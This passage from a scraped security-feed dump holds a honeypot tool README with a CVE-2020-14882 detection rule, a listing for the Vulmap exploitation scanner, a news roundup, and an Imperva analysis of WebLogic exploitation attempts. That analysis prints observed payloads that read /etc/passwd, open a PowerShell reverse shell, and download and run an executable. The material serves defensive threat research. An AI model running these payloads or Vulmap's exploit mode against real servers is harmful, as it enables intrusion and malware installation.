rotation for you : Melody is designed to run forever on the smallest VPS\n * Minimal configuration required\n * Standalone mode : configure Melody using only the CLI\n * Easily scalable : \n * Statically compiled binary\n * Up-to-date Docker image\n\n# Wishlist\n\nSince I have to focus on other projects right now, I can't put much time in Melody's development.\n\nThere is a lot of rom for improvement though, so here are some features that I'd like to implement someday :\n\n * ~~Dedicated helper program to create, test and manage rules~~ -> Check Meloctl in `cmd/meloctl`\n * Centralized rules management\n * Per port mock application\n\n# Use cases\n\n## Internet facing sensor\n\n * Extract trends and patterns from Internet's noise\n * Index malicious activity, [exploitation](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) attempts and targeted scanners\n * Monitor emerging threats 
exploitation\n * Keep an eye on specific threats\n\n## Stream analysis\n\n * Build a background noise profile to make targeted attacks stand out\n * Replay captures to tag malicious packets in a suspicious stream\n\n# Preview\n\n[](<https://raw.githubusercontent.com/bonjourmalware/melody/master/readme/melody_demo.gif> \"Melody is a transparent internet sensor built for threat intelligence. Supports custom tagging rules and vulnerable application simulation. \\(29\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEhQj2eANGQieq68xNvqOhhw8784kxPiunCGgC3GG4teclp_bm223AyPN61pqQDC2WiFWKphXL1aw_d3kIJxweG-Vrtygyoyr-z6CkaXcsx3astVn2zn2GyMD4NQn35qt7RvYA6tXIgBwlKP491vMWOGiIbkyWZJA7fuslVE5gzSquz0aKOuF21jm9bT>) [](<https://raw.githubusercontent.com/bonjourmalware/melody/master/readme/melody_demo_dash.png> \"Melody is a transparent internet sensor built for threat intelligence. Supports custom tagging rules and vulnerable application simulation. \\(30\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEjoizJNl3LNYyyv9myMlsuI7gmP1E7MSM6weEMAwhxbOF9kmr-8waHDsvhRb2xdofgiYS6isSrf5JoaxaNA87i5DrBemJD6-WcYfcskbfGvG4MpCmR9POqdxJXSONqdrj2wqvFxph_mGP-aGyijgmGsohQIlkulxCW6J_W-raQ7iD_dq8KnkAGkhG1H>)\n\n# Quickstart\n\n[Quickstart details.](<https://bonjourmalware.github.io/melody/installation> \"Quickstart details.\" )\n\n## TL;DR\n\n### Release\n\nGet the latest release at `https://github.com/bonjourmalware/melody/releases`.\n \n \n make install # Set default outfacing interface \n make cap # Set network capabilities to start Melody without elevated privileges \n make certs # Make self signed certs for the HTTPS fileserver \n make enable_all_rules # Enable the default rules \n make service # Create a systemd service to restart the program automatically and launch it at startup \n \n sudo systemctl stop melody # Stop the service while we're configuring it\n\nUpdate the `filter.bpf` file to filter out unwanted packets.\n \n \n sudo systemctl start melody # Start Melody \n 
sudo systemctl status melody # Check that Melody is running \n\nThe logs should start to pile up in `/opt/melody/logs/melody.ndjson`.\n \n \n tail -f /opt/melody/logs/melody.ndjson # | jq\n\n### From source\n \n \n git clone https://github.com/bonjourmalware/melody /opt/melody \n cd /opt/melody \n make build\n\nThen continue with the steps from the [release](<https://github.com/bonjourmalware/melody#release> \"release\" ) TL;DR.\n\n### Docker\n \n \n make certs # Make self signed certs for the HTTPS fileserver \n make enable_all_rules # Enable the default rules \n mkdir -p /opt/melody/logs \n cd /opt/melody/ \n \n docker pull bonjourmalware/melody:latest \n \n MELODY_CLI=\"\" # Put your CLI options here. Example : export MELODY_CLI=\"-s -i 'lo' -F 'dst port 5555' -o 'server.http.port: 5555'\" \n \n docker run \\ \n --net=host \\ \n -e \"MELODY_CLI=$MELODY_CLI\" \\ \n --mount type=bind,source=\"$(pwd)/filter.bpf\",target=/app/filter.bpf,readonly \\ \n --mount type=bind,source=\"$(pwd)/config.yml\",target=/app/config.yml,readonly \\ \n --mount type=bind,source=\"$(pwd)/var\",target=/app/var,readonly \\ \n --mount type=bind,source=\"$(pwd)/rules\",target=/app/rules,readonly \\ \n --mount type=bind,source=\"$(pwd)/logs\",target=/app/logs/ \\ \n bonjourmalware/melody\n\nThe logs should start to pile up in `/opt/melody/logs/melody.ndjson`.\n\n# Rules\n\n[Rule syntax details.](<https://bonjourmalware.github.io/melody/installation> \"Rule syntax details.\" )\n\n## Example\n \n \n CVE-2020-14882 Oracle Weblogic Server RCE: \n layer: http \n meta: \n id: 3e1d86d8-fba6-4e15-8c74-941c3375fd3e \n version: 1.0 \n author: BonjourMalware \n status: stable \n created: 2020/11/07 \n modified: 2020/20/07 \n description: \"Checking or trying to exploit CVE-2020-14882\" \n references: \n - \"https://nvd.nist.gov/vuln/detail/CVE-2020-14882\" \n match: \n http.uri: \n startswith|any|nocase: \n - \"/console/css/\" \n - \"/console/images\" \n contains|any|nocase: \n - \"console.portal\" \n 
- \"consolejndi.portal?test_handle=\" \n tags: \n cve: \"cve-2020-14882\" \n vendor: \"oracle\" \n product: \"weblogic\" \n impact: \"rce\"\n\n# Logs\n\n[Logs content details.](<https://bonjourmalware.github.io/melody/layers> \"Logs content details.\" )\n\n## Example\n\nNetcat TCP packet over IPv4 :\n \n \n { \n \"tcp\": { \n \"window\": 512, \n \"seq\": 1906765553, \n \"ack\": 2514263732, \n \"data_offset\": 8, \n \"flags\": \"PA\", \n \"urgent\": 0, \n \"payload\": { \n \"content\": \"I made a discovery today. I found a computer.\\n\", \n \"base64\": \"SSBtYWRlIGEgZGlzY292ZXJ5IHRvZGF5LiAgSSBmb3VuZCBhIGNvbXB1dGVyLgo=\", \n \"truncated\": false \n } \n }, \n \"ip\": { \n \"version\": 4, \n \"ihl\": 5, \n \"tos\": 0, \n \"length\": 99, \n \"id\": 39114, \n \"fragbits\": \"DF\", \n \"frag_offset\": 0, \n \"ttl\": 64, \n \"protocol\": 6 \n }, \n \"timestamp\": \"2020-11-16T15:50:01.277828+01:00\", \n \"session\": \"bup9368o4skolf20rt8g\", \n \"type\": \"tcp\", \n \"src_ip\": \"127.0.0.1\", \n \"dst_port\": 1234, \n \"matches\": {}, \n \"inline_matches\": [], \n \"embedded\": {} \n }\n\n \n \n\n\n**[Download Melody](<https://github.com/bonjourmalware/melody> \"Download Melody\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T12:30:00", "type": "kitploit", "title": "Melody - A Transparent Internet Sensor Built For Threat Intelligence", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-04-13T12:30:00", "id": "KITPLOIT:914458182851735372", "href": "http://www.kitploit.com/2022/04/melody-transparent-internet-sensor.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-28T07:41:52", "description": "[](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)\n\n \n\n\nVulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists.\n\nVulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use \"-m\" to select which mode to use, and the default poc mode is the default. 
In poc mode, it also supports \"-f\" batch target scanning, \"-o\" File output results and other main functions, Other functions [Options](<https://github.com/zhzyker/vulmap/#options>) Or python3 vulmap.py -h, the Poc function will no longer be provided in the exploit exploit mode, but the exploit will be carried out directly, and the exploit result will be fed back to further verify whether the vulnerability exists and whether it can be exploited.\n\n**Try to use \"-a\" to establish target types to reduce false positives, such as \"-a solr\"**\n\n \n\n\n### Installation\n\nThe operating system must have python3, python3.7 or higher is recommended\n\n * Installation dependency\n \n \n pip3 install -r requirements.txt\n \n\n * Linux & MacOS & Windows\n \n \n python3 vulmap.py -u http://example.com\n \n\n \n\n\n### Options\n \n \n optional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Target URL (e.g. -u \"http://example.com\")\n -f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f \"/home/user/list.txt\")\n -m MODE, --mode MODE The mode supports \"poc\" and \"exp\", you can omit this option, and enter poc mode by default\n -a APP, --app APP Specify a web app or cms (e.g. -a \"weblogic\"). default scan all\n -c CMD, --cmd CMD Custom RCE vuln command, Other than \"netstat -an\" and \"id\" can affect program judgment. defautl is \"netstat -an\"\n -v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v \"CVE-2020-2729\")\n --list Displays a list of vulnerabilities that support scanning\n --debug Debug mode echo request and responses\n --delay DELAY Delay check time, default 0s\n --timeout TIMEOUT Scan timeout time, default 10s\n --output FILE Text mode export (e.g. 
-o \"result.txt\")\n \n\n \n\n\n### Examples\n\nTest all vulnerabilities poc mode\n \n \n python3 vulmap.py -u http://example.com\n \n\nFor RCE vuln, use the \"id\" command to test the vuln, because some linux does not have the \"netstat -an\" command\n \n \n python3 vulmap.py -u http://example.com -c \"id\"\n \n\nCheck <http://example.com> for struts2 vuln\n \n \n python3 vulmap.py -u http://example.com -a struts2\n \n \n \n python3 vulmap.py -u http://example.com -m poc -a struts2\n \n\nExploit the CVE-2019-2729 vuln of WebLogic on <http://example.com:7001>\n \n \n python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n \n \n \n python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729\n \n\nBatch scan URLs in list.txt\n \n \n python3 vulmap.py -f list.txt\n \n\nExport scan results to result.txt\n \n \n python3 vulmap.py -u http://example.com:7001 -o result.txt\n \n\n \n\n\n### Vulnerabilitys List\n\nVulmap supported vulnerabilities are as follows\n \n \n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |\n | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |\n | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |\n | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |\n | Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |\n | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |\n | Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |\n | Apache Struts2 | 
S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |\n | Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |\n | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |\n | Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |\n | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |\n | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |\n | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |\n | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |\n | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |\n | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |\n | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |\n | Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |\n | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |\n | Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |\n | Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |\n | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |\n | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |\n | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |\n | Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability |\n | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 
3.21.1, remote code execution vulnerability |\n | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |\n | Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |\n | Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |\n | Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |\n | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |\n | RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |\n | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |\n | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |\n | ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n \n\n \n\n\n### Docker\n \n \n docker build -t vulmap/vulmap .\n docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com\n\n \n\n\n \n \n\n\n**[Download Vulmap](<https://github.com/zhzyker/vulmap> \"Download Vulmap\" )**\n", "cvss3": {"exploitabilityScore": 3.9, 
"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-25T11:30:00", "type": "kitploit", "title": "Vulmap - Web Vulnerability Scanning And Verification Tools", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0738", "CVE-2010-1428", "CVE-2010-1870", "CVE-2011-3923", "CVE-2013-1966", "CVE-2013-2134", "CVE-2013-2251", "CVE-2014-4210", "CVE-2015-7501", "CVE-2016-3081", "CVE-2016-4437", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-12615", "CVE-2017-12629", "CVE-2017-3506", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-20062", "CVE-2018-2894", "CVE-2018-7600", "CVE-2018-7602", "CVE-2019-0193", "CVE-2019-0230", "CVE-2019-17558", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-6340", "CVE-2019-7238", "CVE-2019-9082", "CVE-2020-10199", "CVE-2020-14882", "CVE-2020-1938", "CVE-2020-2551", "CVE-2020-2555", "CVE-2020-2729", "CVE-2020-2883"], "modified": "2020-12-25T11:30:06", "id": "KITPLOIT:5420210148456420402", "href": "http://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": 
[{"lastseen": "2020-11-02T18:16:16", "description": "We had a very busy week at Malwarebytes Labs. \n\nWe offered advice on [Google's patch for an actively exploited zero-day bug that affects Chrome users](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2020/10/google-patches-exploited-zero-day-bug-that-affects-chrome-users/>), our podcast talked about [finding consumer value in Cybersecurity Awareness Month with Jamie Court](<https://blog.malwarebytes.com/podcast/2020/10/lock-and-code-s1ep18-finding-consumer-value-in-cybersecurity-awareness-month-with-jamie-court/>), we provided guidance about [keeping ransomware cash away from your business](<https://blog.malwarebytes.com/cybercrime/2020/10/keeping-ransomware-cash-away-from-your-business/>), pointed out how [scammers are spoofing bank phone numbers to rob victims](<https://blog.malwarebytes.com/social-engineering/2020/10/scammers-are-spoofing-bank-phone-numbers-to-rob-victims/>), analyzed how a [fake COVID-19 survey hides ransomware in a Canadian university attack](<https://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/>), and discussed [how a new Emotet delivery method was spotted during a downward detection trend](<https://blog.malwarebytes.com/malwarebytes-news/2020/10/new-emotet-delivery-method-spotted-during-downward-detection-trend/>). \n\nBelieve it or not, we also found time to explain what was going on with [the HP printer issue on Mac](<https://blog.malwarebytes.com/malwarebytes-news/2020/10/hp-printer-issue-on-mac/>), analyzed how [California\u2019s Prop 24 splits data privacy supporters](<https://blog.malwarebytes.com/malwarebytes-news/2020/10/prop-24-splits-data-privacy-supporters-in-california/>) and discussed [Vastaamo, a data breach with unprecedented consequences](<https://blog.malwarebytes.com/cybercrime/2020/10/vastaamo-psychotherapy-data-breach-sees-the-most-vulnerable-victims-extorted/>). 
\n\n## Other cybersecurity news\n\n * [Federal agencies](<https://www.nbcnews.com/news/us-news/fbi-other-agencies-warn-imminent-cybercrime-threat-u-s-hospitals-n1245212>) are warning of an increased and imminent cybercrime threat to US hospitals and healthcare providers, especially with regard to ransomware attacks. (Source: NBC)\n * Despite their own claims, questions have been raised as to whether the [SunCrypt](<https://securityboulevard.com/2020/09/the-curious-case-of-suncrypt/>) gang are indeed the newest members of the Maze cartel. (Source: Security Boulevard)\n * The five biggest cybersecurity threats for the healthcare industry as seen by cloud-first security firm [Wandera](<https://www.techrepublic.com/article/security-firm-identifies-5-biggest-cybersecurity-risks-for-hospitals-and-healthcare-organizations/>). (Source: TechRepublic)\n * CVE-2020-14882 A bug in [Oracle Weblogic](<https://isc.sans.edu/diary/rss/26734>) is being actively exploited, and the exploitation is trivial. (Source: InfoSec Handlers Diary Blog)\n * Foreign cyber threats to the [2020 US presidential election](<https://www.digitalshadows.com/blog-and-research/foreign-cyber-threats-to-the-2020-us-presidential-election/>) are predominantly sophisticated disinformation campaigns. (Source: digital shadows)\n * Why [satellite hacking](<https://eurasiantimes.com/why-satellite-hacking-has-become-the-biggest-global-threat-for-countries-like-us-china-russia-india/>) has become the biggest global threat for countries like the US, China, Russia, and India? (Source: The Eurasia Times)\n * [Facebook](<https://www.axios.com/facebook-warns-of-perception-hacks-undermining-trust-in-democracy-59fde96f-51a3-4dc5-b8a0-8f0a6a863840.html>) warned of perception hacks undermining trust in democracy. 
(Source: Axios)\n * Microsoft warned that threat actors are actively exploiting systems unpatched against the [ZeroLogon](<https://www.bleepingcomputer.com/news/security/microsoft-warns-of-ongoing-attacks-using-windows-zerologon-flaw/>) privilege escalation vulnerability in the Netlogon Remote Protocol. (Source: BleepingComputer)\n * [Email compromise attacks](<https://betanews.com/2020/10/29/email-compromise-attacks-increase/>) are on the increase as threat actors shift their focus from finance employees to group mailboxes. (Source: BetaNews)\n * [Zoom](<https://www.zdnet.com/article/zoom-rolls-out-encryption-for-all-desktop-and-mobile-users/>) has kicked off end-to-end encryption for its mobile and desktop apps. (Source: ZDNet)\n\nStay safe, everyone!\n\nThe post [A week in security (October 26 \u2013 November 1)](<https://blog.malwarebytes.com/malwarebytes-news/2020/11/a-week-in-security-october-26-november-1/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-02T17:46:12", "type": "malwarebytes", "title": "A week in security (October 26 \u2013 November 1)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2020-11-02T17:46:12", "id": "MALWAREBYTES:813434778D13E29E56560316C9FCD816", "href": "https://blog.malwarebytes.com/malwarebytes-news/2020/11/a-week-in-security-october-26-november-1/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2020-11-04T08:16:24", "description": "## Introduction\n\nPopular within the commercial sphere, Oracle WebLogic Server is a scalable enterprise Java platform application server for Java-based web applications. When a vulnerability is discovered in WebLogic, hackers will try to exploit it ASAP. \nAnd it\u2019s not only hackers - bug hunters also want to make a quick buck and report the organization\u2019s vulnerability.\n\n## Oracle WebLogic Unauthenticated Complete Takeover RCE (CVE-2020\u201314882)\n\nThis vulnerability is an unauthenticated Remote Code Execution (RCE), which means you need to send a single HTTP request to the vulnerable WebLogic server to exploit it, and you don\u2019t need to be authenticated to take control of the server.\n\nA [video](<https://www.youtube.com/watch?v=JFVDOIL0YtA>) showing the Proof Of Concept (POC) was released on October 28, 2020, and a detailed report of the vulnerability was published on [Medium](<https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf>) on the same day.\n\n## Bug hunters\n\nNowadays, hunting for bugs and earning money is a common practice. \nTo make their job easier, bug hunters create many tools and automated scanning systems to find and exploit bugs - allowing them to be the first to find the bug and earn money. \nThese automated systems are an orchestration of multiple tools. 
\nThe outcome of the scans they perform is information about a company - information on the domains, sub-domains, technological stack, IPs, and more that\u2019s stored in databases. \n\nWhen a new vulnerability, like WebLogic RCE, is discovered, the bug hunter can pull all the domains that run WebLogic and try to exploit it with a push of a button.\n\n\u201cNuclei\u201d is one of these tools - a highly customizable tool that allows you to identify vulnerabilities and exploit them using pre-defined [templates](<https://github.com/projectdiscovery/nuclei-templates>). \nWith this tool, you can attack multiple targets at once, thereby increasing your chances of success. \nThese templates contain all the data needed to exploit a specific vulnerability, such as URL, parameters, and payloads. \nYou can find many templates added by the community in the GitHub repository, but you can also create your own templates.\n\n## Exploitation\n\nWhen this kind of vulnerability is published, hackers don\u2019t waste time and will try to exploit it before the vendor and associated companies apply a patch. \nAt Imperva, we have built-in security mechanisms to protect against zero-day attacks, including RCE, on different platforms. \nWhen CVE-2020\u201314882 was published, we searched our data to find exploitation attempts, and found the following: \nThe first exploitation attempt was made on October 28, the same day the POC was published. \nThe attempt was made by the above-mentioned tools as well as a very popular tool in the bug bounty community, [Nuclei](<https://github.com/projectdiscovery/nuclei>). 
\n\nThe template to exploit CVE-2020-14882 was uploaded on the public \u201cNuclei\u201d template repository on October 29, a day after we saw the first exploitation attempt using \u201cNuclei\u201d.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/11/unnamed.png>) \n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/11/pasted-image-0.png>)\n\nOn October 28, we saw many user-agents, indicating the bug hunter had carried out the exploitation:\n\n * Nuclei - Open-source project (github.com/projectdiscovery/nuclei)\n * Bug Bounty\n * Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36 -- [ethical-bugbot]@protonmail.com\n * Fuzz Faster U Fool v1.2.0-git\n * httpx - Open-source project (github.com/projectdiscovery/httpx)\n\nAll these user-agents are related to tools used by bug hunters.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/11/imageLikeEmbed.png>)\n\nMany of the exploitation attempts were carried out by Golang-based tools. 
\nFor example, \u201cNuclei\u201d, \u201cFuzz Faster U\u201d and \u201chttpx\u201d are all written in Golang and used by the bug bounty community.\n\n## Types of payloads observed\n\n### Information disclosure\n\n * com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('type C:\\Windows\\win.ini');")\n * com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('cat /etc/passwd');")\n * com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('ls');")`\n\n### Reconnaissance / probing\n\n * com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('nslookup xxxxxx.d.requestbin.net');");\n * com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('curl hxxp://xxxxxxxx.ceye.io');");\n * com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('nslookup xxxxxxxxx.0efp3gmy20ijk3tx20mqollbd2jtfh4.burpcollaborator.net')")\n * com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://xx.xx.xx.xxx:xxxxx")\n * com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('ping.exe -n xxxxxxxxx.burpcollaborator.net');");\n\n### Backdoors\n\n * com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec("powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient("xxx.xx.xxx.xxx",1447);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>\n\n### Malware\n\n * com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('powershell -Command (New-Object System.Net.WebClient).DownloadFile('hxxp:/x.x.x.x.xmring.com/update.exe','update.exe');(New-Object -com Shell.Application).ShellExecute('update.exe');');");\n\nHackers and bug hunters use a very 
